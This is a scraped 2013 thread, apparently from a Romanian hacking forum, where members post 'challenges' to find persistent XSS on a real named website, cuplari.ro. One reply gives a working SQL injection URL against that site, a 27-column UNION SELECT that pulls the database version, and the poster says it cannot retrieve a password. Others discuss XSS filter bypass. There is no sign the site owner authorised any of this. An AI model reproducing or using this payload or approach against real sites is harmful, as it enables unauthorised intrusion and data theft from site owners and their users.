HackerMens Posted November 8, 2013 Report Share Posted November 8, 2013 Target:Cuplari.Vulnerable link:profile.Type:Persistent xss.Proof:.To solve this you need to pm me the details.Solvers: Quote Link to comment Share on other sites More sharing options...
bodostyle Posted November 8, 2013 Report Share Posted November 8, 2013 https://rstforums.com/forum/77241-xss-http-www-cuplari-ro.rstç Quote Link to comment Share on other sites More sharing options...
HackerMens Posted November 8, 2013 Author Report Share Posted November 8, 2013 (edited) @bodostyleRead carefully, this is a persistent xss, the one there is reflected meaning it will not work on internet explorer and chrome . Also, this one has a nice filter and takes some skill to bypass, the one found there is just a simple find. Edited November 8, 2013 by HackerMens Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted November 9, 2013 Active Members Report Share Posted November 9, 2013 (edited) www.cuplari.ro/dass--379234' and 0 UNION SELECT 1,2,3,4,5,6,7,concat('danyweb09::',version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27`.htmlsql injection redirecting to kesarwith this sqli i cant get the password from your lost account:)) Edited November 9, 2013 by danyweb09 Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted November 9, 2013 Active Members Report Share Posted November 9, 2013 Ok good, last time i checked, this was persistent xss challenge and not SQLi.Read better next time.Regards,El Generante.CU RESPECT!Require account for the persistent xss? Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted November 9, 2013 Active Members Report Share Posted November 9, 2013 (edited) strongboyy--379247You want pm?//Scuze pentru dublu post nu stiam ca mesajele lui au fost sterse// Edited November 9, 2013 by danyweb09 Quote Link to comment Share on other sites More sharing options...